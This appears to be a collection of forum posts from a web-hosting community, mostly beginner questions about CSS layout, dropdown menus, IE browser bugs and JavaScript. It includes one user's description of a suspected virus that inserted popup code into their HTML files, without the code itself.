Hi im trying to create a button with 2 borders different colors.

I want to have a gradient image as the background and a white border and then a blue border.

As I don't have a set width for the buttons it would help doing the borders with css, but im not sure how.

I want it to look something like this. (the blob does not have the gradient in it, but you can get the idea.)

Menu and rollover help

Ok, I have started a site here:

Now I have a question on the menus. I have it so css hovers move the submenus of pictures from left:-999px to left:auto so that the menus only show when you move the mouse over them. Then the pictures themselves display an image (using javascript) when you mouse over them. My question is, how can I use javascript to automatically attach the onClick event to these thumbnails so that the menu moves back to -999px (disappears) when they are clicked on? I want users to have an easy time displaying one image and then viewing it, without having to avoid the mouseover on other images.

I believe I just need a script that looks at all <a> tags with the rev attribute, and then onclick, it needs to make their parent <ul> set to left:-999px, but unfortunately I'm not very good with javascript.

I also really want this to work in "all" browsers (firefox, safari, opera, IE7 are all being tested, no tests for IE6 yet)

Okay, so I know that a JavaScript library is an easy way to get code without writing it yourself, but I have a question about their use. If you look at a repository of various libraries, there are some libraries with very specific uses like "Rounded Corners without Images" and there are some like "Full Library". What I want to know, is what a library actually is? Just a file with tons of functions that work together to do something, or is it something else?

So I am making this game that is town based and everyone runs their own town. You can conquer towns next to you to expand your empire. The thing with this is that when you conquer the town next to you, the two towns merge into one larger town.

On the world map, I want to be able to show a different image showing the two merged towns. What would be the best way to do this? (This is a browser based game.)

Hi!!

i have been working on a lot of html files (in thousands) that are scattered in my pc. Last day when i started pc and started Opera, then pages that i opened in the last run were there (its my defalt setting), but the strange thing with those pages was that all pages contained a popup (including my local html files and my site's offiline files (coming from cache). I was surprised, i checked the code and found that each page (HTML) on my pc contains an extra bit of code:

This is written two times when i saw the HTML in notepad (in all pages) but when i checked Opera source of the HTML files, it was there just 1 time.

The code appears as many times as the Virus or something else has modified. So i have files with the popup line repeading 6-7 times also.

as clearly written in the code, it opens a readme.eml file. Its an Email File and contains an email coming from an email address that is not actually my email address but its the word that i used to use widely on the net. "HSA-Supers".

Size of the eml file was 14.7 KB with some understandable text and a lot of Encrypted text. ( I think it was XML (may be not)).

Please comment what was it, how to get rid of it? All of my HTML files in my PC are edited by it, how to get them back?

There are two things I want to accomplish: first, how do I get the "bottom_" DIV's height to extend up to my browser height? Right now, the "bottom_" DIV's height sets itself to one browser screen's height, regardless of where it is. I want the "bottom_" DIV's to be only as tall as the web browser's screen, and only extend its height when more text is entered.

Secondly, let's say I'm using the "center" DIV as my main text section. When there's more text in "center" than the size of the DIV allows, the extra text continues

underneath

the "bottom_center" DIV. How do I get that text to show up on top of "bottom_center"? Furthermore, if at all possible, going along with the idea in the above paragraph, I would only like the "bottom_" row of DIVs to extend based on the amount of text in the "center" DIV. Or would I have to start writing more text directly on the "bottom_center" DIV once the "center" DIV fills up?

Ok I need someone who knows css well to view this page in Firefox (I've used 3 but 2 should work) then IE (preferably 7)

The problem, is IE is placing the dark box ontop of the menus. I am using the css from here (http://www.htmldog.com/articles/suckerfish/dropdowns/) and this javascript (http://www.dynamicdrive.com/dynamicindex4/thumbnail2.htm) for the rollovers to change the main image.

I think it has to do with z-indexing, which I tried to correct by giving a bunch of elements values, but it hasn't fixed it in IE.

I'm not sure what part of the css or html to post so please someone look it over.

I am looking for some way (with Javascript or something) to tell exactly where someone clicks on an image. (AND DON'T SAY AN IMAGE MAP!!!) For example, if I have an image that is 1000 x 1000 pixels, and someone clicks at (583, 789), that is what the script will read. I need this for a browser based game that I am making.

You take a code you find on here, you copy & paste it into your web-address bar (Which should currently say something like...http://frihost.com/forums/) Press enter, and it "preforms" a trick!

Just starting to look into javacript libraries like Jquery, Mootools, Dojo and all the rest of them. Anyway I was wondering how many people on Frihost use them, and if you do which ones do you recommend?

Personally I'm not so sure that they're a good thing, as one well-know javascript developer said people no longer understand the javascript that they're playing around with. (not a perfect quote). What do you think about libraries in particular? Good or bad .

hi everyone,

i have a new css question, i have fixed the width issue i was talking about earlier but i now have a mystery line coming from the tables maybe in the drop down menu, i'm not really sure. they only appears in the first part so the rest shows up properly but with or without hover the line is there under the text but only the second part that wraps so it shouldnt be an underline.

this problem doesnt show up in ie6 but the for some reason the text is larger in the ie6 than in firefox. text size is set to medium so i dont think its like a simple issue. anyway any help from the css mastas would be great.

ok, so here's what i have. My HTML tag has a background color and background image at the top of the page. Then my BODY tag has a background image positioned at the bottom of the page. This works great in firefox...there's a top background followed by a color background and at the bottom of the page there's another image background.

Only problem is......it won't work in IE....any workarounds out there? or am i going to have to work it out with divs? the problem with ie is that in the style sheet it recognizes the background image of the BODY tag and displays that, but won't display the background image of the HTML tag, although it does display the background color of the HTML tag...any suggestions would be appreciated.

My problem is when you hover over the main categorys the sub ones show up ok and you can hover over them.

Its when you move of the main categorys the sub nav box does not close.

But if you hover over the category box then over to the sub nav box and then move of it will close ok.

How can i fix this?

In my mind i know why its doing it but i can't really seem to be able to say/do it.

Hi I made a wicked looking website and was testing it in IE 7 and Firefox and in both looked identical.

so carried on designing.

little did I know that IE 6 was laughing at me! coz when I finally tested it in IE 6 the nav bar went down instead of across.

Not I have tried with my knowlage of CSS and nothing and it is like 4am and cannot be bother to search.

So was wondering if anybody had the time to look at my code

I am using an ul list for my navigation, but I am unable to center it horizontally.
The HTML is this (Really simple stuff..)

Hello all.

Well, I am generating a table trough PHP, the table consists of 3 collums. The amount of rows may vary from 1-8.
In each cell I want to display a resized, different image. the height of all the images should be 100 and the width may vary, scaling with the height.
Now, I have all this, but there is one problem.
the width of the cells is still the width of the Original images; not the resized ones, however the images themselves resize correctly and the heigth of the cell is also right. (100, since the pics are 100 high)
I'd also like it if all the collumns would have the same width.
I tried to set the cell width to 200 or something similar, but that isn't working for me.

does anyone knows how I could either:
- Force the cell to a width of 200.
- Force the image width to the right width.

i'm trying to modify a drupal stylesheet so that i can add a header, banner and drop-down menu to the top part of the blog i installed. so far i was able to make the header and logo appear centered in the page with the rollover on the right hand side of the banner.

the real problem has been to get the drop down menu working. i have tried different templates and all have failed including the original one i have on the regular site http://www.whatsyourimpact.eu.org/. the problem i'm having now is that the menu comes up fine its just covered by the mainpart of the blog that has all the content what they call node-1.

i've tried playing with the z index but that didnt do a thing. any advice on how to fix this would be great.

IE 6 Display Error

I have a display error in IE 6.
The first error is shown in this screenshot of the page in IE 6:

Many of the borders have a gap between the top part and the middle and the bottom.
It should look like this screenshot in Firefox:

I need there to not be a gap, obviously. I'm not sure why it is like that, and any help would be greatly appreciated.
